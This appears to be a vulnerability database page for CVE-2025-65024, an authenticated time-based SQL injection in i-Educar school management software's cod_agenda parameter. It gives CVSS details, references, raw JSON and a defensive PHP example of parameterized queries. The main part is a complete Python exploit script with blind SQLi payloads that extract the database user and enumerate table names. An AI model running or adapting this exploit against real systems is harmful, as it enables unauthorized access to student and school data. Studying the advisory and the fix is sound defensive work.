Security Vulnerability Report
CVE-2025-65024 CVSS 7.2 HIGH

CVE-2025-65024

Published: 2025-11-19 16:15:50
Last Modified: 2025-11-20 17:11:17

Description

i-Educar is free, fully online school management software. In versions 2.10.0 and prior, an authenticated time-based SQL injection vulnerability exists in the ieducar/intranet/agenda_admin_cad.php script. An attacker with access to an authenticated session can execute arbitrary SQL commands against the application's database. This vulnerability is caused by the improper handling of the cod_agenda GET parameter, which is directly concatenated into an SQL query without proper sanitization. This issue has been patched in commit 3e9763a.
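The root cause named in the description, a request parameter concatenated straight into SQL text, and the standard remediation, a parameterized query with input validation, shown side by side in a constructed PHP snippet. This is an added illustrative example, not i-Educar's code and not the fix in commit 3e9763a; the table name, column names and PDO usage are assumptions.

```php
<?php
// Added illustrative example; NOT i-Educar's code or its patch.
// Table name, column names and the use of PDO are assumptions.

// Vulnerable pattern: the GET parameter is spliced into the SQL string, so a
// quote or SQL syntax inside cod_agenda becomes part of the statement the
// database executes (CWE-89).
function load_agenda_vulnerable(PDO $db, array $get)
{
    $cod_agenda = $get['cod_agenda'] ?? '';
    $sql = "SELECT * FROM agenda WHERE cod_agenda = '" . $cod_agenda . "'";
    return $db->query($sql)->fetch(PDO::FETCH_ASSOC);
}

// Hardened pattern: enforce the type the parameter is expected to have, then
// bind it as a query parameter so the database never parses user input as SQL.
function load_agenda_hardened(PDO $db, array $get)
{
    $cod_agenda = filter_var($get['cod_agenda'] ?? null, FILTER_VALIDATE_INT);
    if ($cod_agenda === false) {
        // Reject anything that is not an integer identifier.
        http_response_code(400);
        return false;
    }
    $stmt = $db->prepare('SELECT * FROM agenda WHERE cod_agenda = :cod_agenda');
    $stmt->bindValue(':cod_agenda', $cod_agenda, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

// Self-contained demonstration against an in-memory SQLite database
// (constructed sample data, not taken from the application).
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE agenda (cod_agenda INTEGER PRIMARY KEY, titulo TEXT)');
$db->exec("INSERT INTO agenda VALUES (1, 'reuniao'), (2, 'prova')");

// A well-formed identifier is accepted by the hardened version.
var_dump(load_agenda_hardened($db, ['cod_agenda' => '2']));   // row with titulo 'prova'

// Input that is not an integer is rejected before any SQL is built.
var_dump(load_agenda_hardened($db, ['cod_agenda' => "1' OR 1=1--"])); // bool(false)
```

The validation step matters independently of the prepared statement: binding with `PDO::PARAM_INT` stops the input from being interpreted as SQL, while `FILTER_VALIDATE_INT` makes malformed identifiers fail loudly at the edge, which is also the point at which a 400 response can be logged and alerted on.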

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:portabilis:i-educar:*:*:*:*:*:*:*:* - VULNERABLE
i-Educar <= 2.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-65024 Time-based SQL Injection PoC
# Target: i-Educar <= 2.10.0
# Endpoint: /ieducar/intranet/agenda_admin_cad.php?cod_agenda=[payload]
import requests
import time
import string

target_url = "http://target.com/ieducar/intranet/agenda_admin_cad.php"

# Assume valid session cookie is obtained after authentication
cookies = {
    "PHPSESSID": "your_authenticated_session_id"
}


def sql_injection_time_based(payload):
    """Send time-based SQL injection payload and measure response time"""
    params = {"cod_agenda": payload}
    start_time = time.time()
    response = requests.get(target_url, params=params, cookies=cookies, timeout=30)
    elapsed = time.time() - start_time
    return elapsed, response.status_code


def extract_data_via_time_based_blind_injection():
    """Example: Extract database user using time-based blind injection"""
    charset = string.ascii_lowercase + string.digits + "_@."
    result = ""
    print("[*] Starting time-based blind SQL injection...")

    # Example: Extract current database user (length extraction)
    # Note: if no length matches, `length` keeps the last loop value (29).
    for length in range(1, 30):
        payload = f"1' AND (SELECT CASE WHEN (LENGTH(CURRENT_USER())={length}) THEN SLEEP(3) ELSE 0 END)--"
        elapsed, _ = sql_injection_time_based(payload)
        if elapsed >= 3:
            print(f"[+] Database user length: {length}")
            break

    # Example: Extract database user character by character
    for pos in range(1, length + 1):
        for char in charset:
            payload = f"1' AND (SELECT CASE WHEN (SUBSTRING(CURRENT_USER(),{pos},1)='{char}') THEN SLEEP(3) ELSE 0 END)--"
            elapsed, _ = sql_injection_time_based(payload)
            if elapsed >= 3:
                result += char
                print(f"[*] Position {pos}: {result}")
                break

    print(f"[+] Extracted database user: {result}")
    return result


def extract_database_tables():
    """Extract table names from information_schema"""
    tables = []
    charset = string.ascii_lowercase + string.digits + "_"

    for table_idx in range(50):  # Limit to 50 tables
        table_name = ""
        for char_pos in range(1, 50):
            found = False
            for char in charset:
                # Extract table name using substring and sleep
                payload = f"1' AND (SELECT CASE WHEN (SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT {table_idx},1),{char_pos},1)='{char}') THEN SLEEP(2) ELSE 0 END)--"
                elapsed, _ = sql_injection_time_based(payload)
                if elapsed >= 2:
                    table_name += char
                    found = True
                    break
            if not found:
                break
        if table_name:
            tables.append(table_name)
            print(f"[+] Found table: {table_name}")
        else:
            break

    return tables


if __name__ == "__main__":
    print("[*] CVE-2025-65024 - i-Educar Time-based SQL Injection")
    print("[*] Target: i-Educar <= 2.10.0")
    print("[*] File: agenda_admin_cad.php")
    print("[*] Parameter: cod_agenda")

    # Test basic connectivity and time-based injection
    print("\n[*] Testing basic connectivity...")
    test_payload = "1' AND 1=1--"
    elapsed, status = sql_injection_time_based(test_payload)
    print(f"[*] Response time: {elapsed:.2f}s, Status: {status}")

    # Test time-based injection detection
    print("\n[*] Testing time-based injection...")
    sleep_payload = "1' AND SLEEP(5)--"
    elapsed, _ = sql_injection_time_based(sleep_payload)
    print(f"[*] SLEEP(5) response time: {elapsed:.2f}s")

    if elapsed >= 4:
        print("[+] Time-based SQL injection confirmed!")
        print("\n[*] Extracting database information...")
        extract_data_via_time_based_blind_injection()
        extract_database_tables()
    else:
        print("[-] Injection test failed - target may not be vulnerable or different payload required")
```

References

https://github.com/portabilis/i-educar/commit/3e9763a561b328edaed21a7dc2e0dba0bbbc6e22 (Patch)
https://github.com/portabilis/i-educar/security/advisories/GHSA-6c8p-xqcv-rghx (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65024", "sourceIdentifier": "[email protected]", "published": "2025-11-19T16:15:49.783", "lastModified": "2025-11-20T17:11:17.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "i-Educar is free, fully online school management software. In versions 2.10.0 and prior, an authenticated time-based SQL injection vulnerability exists in the ieducar/intranet/agenda_admin_cad.php script. An attacker with access to an authenticated session can execute arbitrary SQL commands against the application's database. This vulnerability is caused by the improper handling of the cod_agenda GET parameter, which is directly concatenated into an SQL query without proper sanitization. This issue has been patched in commit 3e9763a."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:portabilis:i-educar:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.10.0", "matchCriteriaId": "877348AB-B600-47B3-A565-8198483C6414"}]}]}], "references": [{"url": "https://github.com/portabilis/i-educar/commit/3e9763a561b328edaed21a7dc2e0dba0bbbc6e22", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/portabilis/i-educar/security/advisories/GHSA-6c8p-xqcv-rghx", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}